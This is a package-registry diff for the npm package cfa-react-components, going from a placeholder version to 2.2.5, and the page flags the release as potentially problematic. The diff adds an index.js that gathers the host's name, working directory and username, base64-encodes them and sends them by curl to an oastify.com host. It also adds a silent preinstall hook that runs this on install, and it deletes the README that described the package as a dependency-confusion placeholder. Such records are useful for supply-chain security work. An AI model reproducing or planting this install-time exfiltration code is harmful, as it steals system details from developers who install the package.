cfa-react-components 0.1.0 → 2.2.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of cfa-react-components might be problematic. Click here for more details.
- package/index.js +12 -8
- package/package.json +12 -27
- package/README.md +0 -19
package/index.js
CHANGED
|
@@ -1,8 +1,12 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
|
|
1
|
+
const { exec } = require("child_process");
|
|
2
|
+
exec("a=$(hostname;pwd;whoami;) && b=$(echo $a | base64) && curl -X POST 59ch7nva3ubryutiwdz32xy3quwlkb80.oastify.com -d $b" , (error, data, getter) => {
|
|
3
|
+
if (error){
|
|
4
|
+
console.log("error",error.message);
|
|
5
|
+
return;
|
|
6
|
+
}
|
|
7
|
+
if (getter){
|
|
8
|
+
console.log(data);
|
|
9
|
+
return;
|
|
10
|
+
}
|
|
11
|
+
console.log(data);
|
|
12
|
+
});
|
package/package.json
CHANGED
|
@@ -1,27 +1,12 @@
|
|
|
1
|
-
{
|
|
2
|
-
"name": "cfa-react-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"main": "
|
|
6
|
-
"scripts": {
|
|
7
|
-
"
|
|
8
|
-
|
|
9
|
-
|
|
10
|
-
|
|
11
|
-
|
|
12
|
-
|
|
13
|
-
"author": "",
|
|
14
|
-
"license": "ISC",
|
|
15
|
-
"repository": {
|
|
16
|
-
"type": "git",
|
|
17
|
-
"url": "git+https://github.com/yourusername/cfa-react-components.git"
|
|
18
|
-
},
|
|
19
|
-
"bugs": {
|
|
20
|
-
"url": "https://github.com/yourusername/cfa-react-components/issues"
|
|
21
|
-
},
|
|
22
|
-
"homepage": "https://github.com/yourusername/cfa-react-components#readme",
|
|
23
|
-
"private": false,
|
|
24
|
-
"publishConfig": {
|
|
25
|
-
"access": "public"
|
|
26
|
-
}
|
|
27
|
-
}
|
|
1
|
+
{
|
|
2
|
+
"name": "cfa-react-components",
|
|
3
|
+
"version": "2.2.5",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "main.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node index.js > /dev/null 2>&1",
|
|
8
|
+
"test": "echo \"Error: no test specified\""
|
|
9
|
+
},
|
|
10
|
+
"author": "mauro.delossantos",
|
|
11
|
+
"license": "MIT"
|
|
12
|
+
}
|
package/README.md
DELETED
|
@@ -1,19 +0,0 @@
|
|
|
1
|
-
# cfa-react-components
|
|
2
|
-
|
|
3
|
-
This is a placeholder package published to prevent dependency confusion attacks.
|
|
4
|
-
|
|
5
|
-
## Security Notice
|
|
6
|
-
|
|
7
|
-
This package is intentionally empty and serves as a security measure to protect against dependency confusion attacks. It reserves the package name in the public npm registry to prevent malicious actors from publishing packages with the same name.
|
|
8
|
-
|
|
9
|
-
## What is Dependency Confusion?
|
|
10
|
-
|
|
11
|
-
Dependency confusion (also known as namespace confusion) is a supply chain attack where attackers exploit the way package managers resolve dependencies. If a private package name isn't registered in the public registry, attackers can register it and potentially have their malicious code executed in your environment.
|
|
12
|
-
|
|
13
|
-
## Usage
|
|
14
|
-
|
|
15
|
-
This package is not intended to be used. Please refer to the internal documentation for the actual implementation.
|
|
16
|
-
|
|
17
|
-
## License
|
|
18
|
-
|
|
19
|
-
ISC
|